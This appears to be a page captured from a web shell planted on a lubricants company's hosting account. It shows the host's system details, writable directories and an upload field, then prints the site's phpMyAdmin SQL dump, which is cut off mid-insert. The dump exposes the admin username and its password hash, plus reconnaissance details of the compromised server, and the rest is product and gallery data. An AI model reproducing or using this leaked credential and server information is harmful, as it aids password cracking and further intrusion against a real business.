Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1112.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u451330669 ( 451330669)
PHP Version : 8.2.27
Disable Function : NONE
Directory :  /home/u451330669/domains/renollubricants.in/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u451330669/domains/renollubricants.in/public_html/u451330669_renold.sql
-- phpMyAdmin SQL Dump
-- version 5.2.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1:3306
-- Generation Time: May 28, 2025 at 05:37 AM
-- Server version: 10.11.10-MariaDB-log
-- PHP Version: 7.2.34

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `u451330669_renold`
--

-- --------------------------------------------------------

--
-- Table structure for table `about`
--

CREATE TABLE `about` (
  `id` int(11) NOT NULL,
  `about` text NOT NULL,
  `image` text NOT NULL,
  `short_desc` text NOT NULL,
  `description` text NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `about`
--

INSERT INTO `about` (`id`, `about`, `image`, `short_desc`, `description`, `status`) VALUES
(1, 'About Us', '629540799_india-10-year-bond-yield-near-30-month-low-as-us-peers-oil-prices-fall.webp', '<p style=\"text-align:justify\">Founding history &amp; background: <strong>Founded in 2014, Renol Lubricants was built on a bold ambition: to meet the rising demand for high-performance lubricants and greases that combine quality, reliability, and value.</strong><br />\r\nWe serve as a trusted partner to industries and engine builders alike&mdash;fueling efficiency, durability, and growth across sectors that power the world.</p>', '<p style=\"margin-left:.5in\"><strong>Milestones &ndash; Our Journey</strong></p>\r\n\r\n<p>At Renol Lubricants, growth has been driven by vision, innovation, and a deep understanding of market needs. Here&#39;s how we&#39;ve evolved since our inception:</p>\r\n\r\n<p style=\"margin-left:.5in\"><strong>???? Timeline of Key Milestones</strong></p>\r\n\r\n<ul>\r\n	<li><strong>2014</strong> &ndash; Initiated operations with <strong>lubricant trading and filling</strong> to serve cost-effective, quality-focused markets.</li>\r\n	<li><strong>2016</strong> &ndash; Established <strong>in-house manufacturing facility</strong>, enhancing control over quality and supply chain.</li>\r\n	<li><strong>2018</strong> &ndash; Expanded product portfolio with the launch of <strong>automotive and industrial greases</strong>.</li>\r\n	<li><strong>2019</strong> &ndash; Entered the <strong>industrial lubrication</strong> segment, offering tailored solutions for machinery and heavy-duty applications.</li>\r\n	<li><strong>2024</strong> &ndash; Diversified into <strong>engine coolants</strong>, reinforcing our commitment to complete vehicle and equipment care.</li>\r\n</ul>', 1);

-- --------------------------------------------------------

--
-- Table structure for table `admin_users`
--

CREATE TABLE `admin_users` (
  `id` int(11) NOT NULL,
  `username` varchar(255) NOT NULL,
  `password` varchar(255) NOT NULL,
  `role` int(11) NOT NULL,
  `email` varchar(50) NOT NULL,
  `mobile` varchar(50) NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `admin_users`
--

INSERT INTO `admin_users` (`id`, `username`, `password`, `role`, `email`, `mobile`, `status`) VALUES
(1, 'renold', '$1$WaBbF7r7$xevRDp6/g9fBmA4kuZCXS0', 0, '', '', 1);

-- --------------------------------------------------------

--
-- Table structure for table `banner`
--

CREATE TABLE `banner` (
  `id` int(11) NOT NULL,
  `banner` text DEFAULT NULL,
  `image` varchar(255) NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `banner`
--

INSERT INTO `banner` (`id`, `banner`, `image`, `status`) VALUES
(1, 'oil', '843025301_bb1.png', 1),
(4, 'Grease', '481878200_bb2.png', 1);

-- --------------------------------------------------------

--
-- Table structure for table `categories`
--

CREATE TABLE `categories` (
  `id` int(11) NOT NULL,
  `categories` varchar(255) NOT NULL,
  `image` text NOT NULL,
  `status` tinyint(4) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `categories`
--

INSERT INTO `categories` (`id`, `categories`, `image`, `status`) VALUES
(3, 'LUBRICANTS', '373966752_ep-lubricant-oil.jpg', 1),
(5, 'Grease', '908875449_Navy Yellow Modern Elegant Company Profile Booklet.png', 1);

-- --------------------------------------------------------

--
-- Table structure for table `firstbanner`
--

CREATE TABLE `firstbanner` (
  `id` int(11) NOT NULL,
  `firstbanner` text NOT NULL,
  `image` text NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `firstbanner`
--

INSERT INTO `firstbanner` (`id`, `firstbanner`, `image`, `status`) VALUES
(1, 'Rainbow', '893234737_images (1).png', 1),
(2, 'mirchi', '518245120_Miraj_Group_Logo.png', 1),
(3, 'tngersoll', '485287318_Ingersoll-Rand-logo.png', 1),
(4, 'cletza', '702069711_cletza-lifescience-logo.webp', 1),
(5, 'barugard', '643194009_logo-min-min.jpg', 1),
(6, 'micons', '982929699_images (4).png', 1);

-- --------------------------------------------------------

--
-- Table structure for table `gallary`
--

CREATE TABLE `gallary` (
  `id` int(11) NOT NULL,
  `gallary` text NOT NULL,
  `image` text NOT NULL,
  `status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `gallary`
--

INSERT INTO `gallary` (`id`, `gallary`, `image`, `status`) VALUES
(9, 'Painting Service', '177341082_WhatsApp Image 2024-11-16 at 10.01.52 AM.jpeg', 1),
(10, '', '882022041_WhatsApp Image 2024-11-16 at 10.04.06 AM (1).jpeg', 1),
(11, '', '265907587_WhatsApp Image 2024-11-16 at 10.04.06 AM (2).jpeg', 1),
(12, '', '548128175_WhatsApp Image 2024-11-16 at 10.04.06 AM.jpeg', 1),
(13, '', '563199277_WhatsApp Image 2024-11-16 at 10.04.05 AM (1).jpeg', 1),
(14, '', '909291669_WhatsApp Image 2024-11-16 at 10.04.05 AM.jpeg', 1);

-- --------------------------------------------------------

--
-- Table structure for table `product`
--

CREATE TABLE `product` (
  `id` int(11) NOT NULL,
  `categories_id` int(11) NOT NULL,
  `seller_id` int(11) NOT NULL,
  `sub_categories_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `mrp` float NOT NULL,
  `price` float NOT NULL,
  `qty` int(11) NOT NULL,
  `image` varchar(255) NOT NULL,
  `short_desc` varchar(2000) NOT NULL,
  `description` text NOT NULL,
  `best_seller` int(11) NOT NULL,
  `meta_title` varchar(2000) NOT NULL,
  `meta_desc` varchar(2000) NOT NULL,
  `meta_keyword` varchar(2000) NOT NULL,
  `added_by` int(11) NOT NULL,
  `status` tinyint(4) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `product`
--

INSERT INTO `product` (`id`, `categories_id`, `seller_id`, `sub_categories_id`, `name`, `mrp`, `price`, `qty`, `image`, `short_desc`, `description`, `best_seller`, `meta_title`, `meta_desc`, `meta_keyword`, `added_by`, `status`) VALUES
(1, 5, 0, 0, 'White /Red Gel Grease', 0, 0, 0, '460958351_1.png', '<div>\r\n<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Calcium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/00/1/2/3 </span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 105&deg; - 115&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER/ RED</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em;\">\r\n<p><strong>100 gm,200 gm, 250 gm,500 gm, 1kg,2kg, 5kg,10 &amp;18 kg Bucket, 170 kg Drum</strong></p>\r\n</div>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2, 5, 0, 0, 'AMBER/Red MP-3 Grease', 0, 0, 0, '257395250_2.png', '<div>\r\n<div>\r\n<div style=\"font-size: 25.3333px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Calcium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/00/1/2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Drop Point: 103&deg; - 110&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER/ Red</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>5 kg ,10 KG Bucket ,18 Bucket, 170 KG Drum</strong></p>\r\n</div>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(3, 5, 0, 0, 'APLL Grease', 0, 0, 0, '755497868_4.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Calcium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 105&deg; - 115&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: GREEN</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>18 Bucket , 170 Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(4, 5, 0, 0, 'SLR Chassis Pure grease', 0, 0, 0, '617175063_4.png', '<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<div>\r\n<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:14.6667px\">Calcium Base</span></p>\r\n\r\n<p><span style=\"color:rgb(0, 0, 0)\">Grades: NLGI 0/00/1/2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Drop Point: 100&deg; - 110&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: GREEN</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><strong>250 gms ,500 gms , 1 kg , 2 kg , 5 kg, 10 Bucket , 18 Bucket, 170 Drum</strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2328, 5, 0, 0, 'Chassis 1st Grease', 0, 0, 0, '513800208_4.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px; letter-spacing:0em\">Calcium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/00/1/2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 100&deg; - 110&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: GREEN</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>1 kg , 18 kg Bucket , 170 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2329, 5, 0, 0, 'wheel bearing', 0, 0, 0, '164400815_5.png', '<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<div>\r\n<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px\">Sodium Base</span></p>\r\n\r\n<p><span style=\"color:rgb(0, 0, 0)\">D</span><span style=\"color:rgb(0, 0, 0)\">rop Point: 170&deg; - 180&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: BROWN/ BLACK</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><strong>200 gm , 250 gm, 500 gm , 1 kg , 18 kg Bucket ,170 kg Drum</strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2330, 5, 0, 0, 'Graphite Grease', 0, 0, 0, '140933551_6.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px; letter-spacing:0em\">Calcium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/00/1/2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 105&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: BLACK</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>18 kg Bucket , 180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2331, 5, 0, 0, 'High Temprature', 0, 0, 0, '894938352_3.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px\">Non-Soap Grease</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Drop Point: 325&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: amber</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align:left\"><strong>18 kg Bucket, 180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2332, 5, 0, 0, 'AP-3 Grease', 0, 0, 0, '453658161_2.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:12px\">Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 0/00/1/2/3 </span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 105&deg; - 115&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER/ RED</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em;\">\r\n<p><strong>18 Bucket ,180 Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2333, 5, 0, 0, 'Red Gel-  Grease', 0, 0, 0, '565856428_2.png', '<div>\r\n<div style=\"font-size: 25.3333px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px\">Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2/3</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 185&deg; - 205&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p style=\"text-align:left\"><span style=\"color:rgb(0, 0, 0)\">Color Available: Red</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align:left\"><strong>500 gms , 1 kg , 2 kg , 3 kg , 5 kg , 7 kg , 10 kg Bucket </strong></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><strong>18 Bucket , 180 Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2334, 5, 0, 0, 'EP-2 Grease', 0, 0, 0, '173567960_3.png', '<div>\r\n<div style=\"font-size: 18.2013px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0); font-size:12px; letter-spacing:0em\">Lithium Base</span></p>\r\n\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 180&deg; - 200&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: right;\">\r\n<p style=\"text-align: left;\"><strong>18 kg Bucket ,180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2335, 5, 0, 0, 'EP 0/00/000 grease', 0, 0, 0, '982303945_3.png', '<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Drop Point: 170&deg; - 180&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER</span></p>\r\n\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:12px\">Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: justify;\">\r\n<p><strong>18 Bucket ,180 Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2336, 5, 0, 0, 'EPL-2 Grease', 0, 0, 0, '130541094_3.png', '<div>\r\n<div style=\"font-size: 18.2013px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0); font-size:12px; letter-spacing:0em; text-transform:uppercase\">Semi Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 140&deg;-150&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>18 kg Bucket ,180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2337, 5, 0, 0, 'EPl 0/00/000 grease', 0, 0, 0, '767916233_3.png', '<div>\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Grades: 2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">D</span><span style=\"color:rgb(0, 0, 0)\">rop Point: 130&deg;-140&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12.0001px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: justify;\">\r\n<p><span style=\"color:rgb(0, 0, 0)\">Color Available: AMBER</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px\">Semi Lithium Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><strong>18 Bucket ,180 Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
(2338, 5, 0, 0, 'Blue Gel Grease', 0, 0, 0, '338928514_AP-3 Grease.png', '<div>\r\n<div style=\"font-size: 14.6667px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase;\">\r\n<p><span style=\"color:rgb(0, 0, 0); font-size:18.4091px; letter-spacing:0em\">Lithium Complex Base</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">G</span><span style=\"color:rgb(0, 0, 0)\">rades: NLGI 2</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Drop Point: 240&deg; - 280&deg; C</span></p>\r\n</div>\r\n\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-align: right;\">\r\n<p style=\"text-align: left;\"><span style=\"color:rgb(0, 0, 0)\">Color Available: BLUE</span></p>\r\n</div>\r\n</div>\r\n\r\n<div>\r\n<div style=\"font-size: 12px; line-height: 1.4; direction: ltr; letter-spacing: 0em; text-transform: uppercase; text-align: center;\">\r\n<p style=\"text-align: left;\"><strong>18 kg Bucket , 180 kg Drum</strong></p>\r\n</div>\r\n</div>', '', 0, '', '', '', 0, 1),
